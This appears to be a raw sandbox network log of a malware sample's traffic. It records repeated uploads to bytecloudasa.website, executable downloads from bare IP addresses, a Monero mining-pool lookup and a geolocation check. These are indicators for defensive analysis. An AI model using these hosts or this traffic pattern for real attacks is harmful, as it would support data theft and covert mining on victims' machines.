Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9D0sKxUuEC7jelBEQ5dE3inCDQgtQwiKyZA%2FVywwuKp%2FOuKyRk47kCmh1kIV0F7y4%2BhU1VN9Zde2Q84gk8wHSJIpFLmi6Rl%2BtIs4G%2B4b5TJCtlmlVWWIa7BLhjdPMpoJCJGUecJZcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0694eb7661a-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=sfo58pcoovrkc20kmf5nh5lg0c; expires=Sat, 03 Feb 2024 11:23:16 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:37 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rkktVB9BSI7CJNj8q%2BLNulq32MI6RSJIvQ%2BPBfJtg7sOFlLTeE1mdMiIriTH2mLUnXXKOV7nozhV78woQsBnt%2BRQP21yBh5KIFg%2BsVzuzUmpt%2FydHPW%2F1yIoDal5X48btbdOTpck3A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a06a7fec0a6d-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=pij8jfp7v7sj999tlcjp1cap9u; expires=Sat, 03 Feb 2024 11:23:16 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:37 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=umbrhlN7ZexE%2Bf7cjAR%2B1Y%2FidXmF8cFzNm041H9qTHCcTOxCKLEuxoxa2xPYRhQGgogP7EqDBD2IyYKlCFXdplvs6kkf1N%2F99tEPShLEJMp71KJSpVtSSD3S5oMa7G0esqu9yGSojQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a06b7b490a59-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=1qjm4ah8c2r4c9o46477dqikbj; expires=Sat, 03 Feb 2024 11:23:17 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:38 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TTjJUT%2Fada9lYS3iCL%2FO%2F8uzqOl03OlCS1%2FMB5F%2Fj4hCYnBHG8tVoqRBf1aLhNhoC5uStbMhiNZ8uxmJhM2TUolEwaHC10ZR8%2FjNUxqNSdqPKEUQvqlTkDrRyv3NOqrSr3AoE%2BlVLw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a06c0f60665b-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=i0imne79ldhne2lqgdkfkavsp5; expires=Sat, 03 Feb 2024 11:23:17 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:38 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vsTAnITMVWQ0G9GayRrOB7EYJKBz9faao3UBuCIE30Nsf0hgbGpqsBmZKlz%2F53htwL8Arn%2F3Z3tVei4p4J7T7kZjkOjn4fzes3kfAnDnu0Ht7HsJ3IrdGXcgRympSonSMjOuiwjkLA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a072ff9f665b-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 393692
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=4qbr73nkevkueohaf18stjjtil; expires=Sat, 03 Feb 2024 11:23:32 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:53 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wns3XT1mxzFbkICuULvRxUEY%2FgbAXIi4nRJWorqxK4IVBrSVWsdjUHV%2FduSqQrIvOItZCp0fooqWKK0jO%2FQrcOoFkyAKipca2bN3JFQOEN9dQk6%2Fr7T7kc2BpWrtARKSyzB%2BGEkHug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0771d886561-AMS
DNS

server3.cdntokiog.studio

Remote address:

8.8.8.8:53

Request

server3.cdntokiog.studio

IN A

Response

server3.cdntokiog.studio

IN A

185.82.216.49
DNS

stun3.l.google.com

Remote address:

8.8.8.8:53

Request

stun3.l.google.com

IN A

Response

stun3.l.google.com

IN A

74.125.204.127
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.129.233
DNS

walkinglate.com

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.96.0

walkinglate.com

IN A

188.114.97.0
DNS

127.204.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.204.125.74.in-addr.arpa

IN PTR

Response

127.204.125.74.in-addr.arpa

IN PTR

ti-in-f1271e100net
DNS

233.134.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.134.159.162.in-addr.arpa

IN PTR

Response
DNS

49.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

49.216.82.185.in-addr.arpa

IN PTR

Response

49.216.82.185.in-addr.arpa

IN PTR

davidcom
DNS

0.96.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.96.114.188.in-addr.arpa

IN PTR

Response
DNS

123.10.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

123.10.44.20.in-addr.arpa

IN PTR

Response
DNS

xmr-eu1.nanopool.org

Remote address:

8.8.8.8:53

Request

xmr-eu1.nanopool.org

IN A

Response

xmr-eu1.nanopool.org

IN A

212.47.253.124

xmr-eu1.nanopool.org

IN A

51.68.190.80

xmr-eu1.nanopool.org

IN A

163.172.154.142

xmr-eu1.nanopool.org

IN A

51.15.58.224

xmr-eu1.nanopool.org

IN A

51.68.143.81

xmr-eu1.nanopool.org

IN A

51.15.193.130

xmr-eu1.nanopool.org

IN A

51.15.65.182

xmr-eu1.nanopool.org

IN A

135.125.238.108

xmr-eu1.nanopool.org

IN A

51.255.34.118
DNS

108.238.125.135.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.238.125.135.in-addr.arpa

IN PTR

Response

108.238.125.135.in-addr.arpa

IN PTR

vps-e42d72d2vpsovhnet
DNS

pastebin.com

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
DNS

224.58.15.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

224.58.15.51.in-addr.arpa

IN PTR

Response

224.58.15.51.in-addr.arpa

IN PTR

224-58-15-51 instancesscwcloud

77.91.124.55:19071

AppLaunch.exe

260 B
5
157.240.247.35:443

www.facebook.com

tls

msedge.exe

35.1kB
359.5kB
199
304
142.250.179.141:443

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

tls, http2

msedge.exe

2.2kB
8.9kB
17
20

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

28.8kB
739.0kB
461
665
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.35:443

facebook.com

tls

msedge.exe

1.9kB
4.5kB
16
18
157.240.30.35:443

fbcdn.net

tls

msedge.exe

2.3kB
6.1kB
21
22
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.8kB
8.5kB
15
15

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301384_1HQXQBTAMSF7ILYA2&pid=21.2&w=1080&h=1920&c=4

tls, http2

94.7kB
2.6MB
1881
1873

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301572_19YNEY0IZVD56CZX6&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301163_185KLCMO7GUZRYZ5H&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300932_1F3XVYLI2C551DUEM&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301365_1T2JA9OXDN9GY4HXW&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300951_1DEESSRWOJQZD4FVQ&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301384_1HQXQBTAMSF7ILYA2&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

106.3kB
2.7MB
1844
1970

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

752 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

Explorer.EXE

324.5kB
14.8MB
6275
11106

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2Ib221qx.exe

260 B
5
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

18.0kB
297.2kB
230
236

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
185.216.70.222:80

http://185.216.70.222/trafico.exe

http

Explorer.EXE

8.0kB
452.7kB
171
328

HTTP Request

GET http://185.216.70.222/trafico.exe

HTTP Response

200
176.123.9.142:37637

BE51.exe

1.9MB
21.0kB
1284
342
85.209.176.171:80

http://85.209.176.171/

http

C279.exe

2.3MB
34.8kB
1567
582

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Response

100

HTTP Response

200
104.85.2.139:443

https://learn.microsoft.com/favicon.ico

tls, http2

msedge.exe

34.4kB
1.3MB
628
995

HTTP Request

GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

301

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/478858f5.site-ltr.css

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/7a157846.index-docs.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/toc.json

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

HTTP Request

GET https://learn.microsoft.com/media/logos/logo_net.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

301

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

HTTP Request

GET https://learn.microsoft.com/en-us/media/logos/logo_net.svg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

301

HTTP Request

GET https://learn.microsoft.com/media/logos/logo_net.svg

HTTP Response

301

HTTP Request

POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/favicon.ico

HTTP Response

200
13.107.246.67:443

https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

tls, http2

msedge.exe

3.2kB
91.2kB
44
76

HTTP Request

GET https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

HTTP Response

200
13.107.246.67:443

https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

tls, http2

msedge.exe

3.8kB
72.2kB
36
63

HTTP Request

GET https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

HTTP Response

200
34.255.45.168:443

mscom.demdex.net

tls

msedge.exe

1.0kB
4.9kB
8
9
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

208 B
4
77.91.124.55:19071

2Ib221qx.exe

208 B
4
104.26.13.31:443

https://api.ip.sb/geoip

tls, http

C279.exe

713 B
4.1kB
8
6

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
13.89.179.8:443

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

tls, http2

msedge.exe

2.1kB
7.4kB
14
12

HTTP Request

OPTIONS https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

HTTP Response

200

HTTP Request

OPTIONS https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

HTTP Response

200
13.89.179.8:443

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

tls, http2

msedge.exe

32.4kB
11.3kB
61
53

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959362949&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true

HTTP Response

204

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959363777&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

HTTP Response

204

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959363972&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

HTTP Response

204

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364446&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364473&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364494&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

HTTP Response

200

HTTP Request

POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.7kB
6.9kB
11
11

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.3kB
18.4kB
19
17

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
104.21.61.162:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

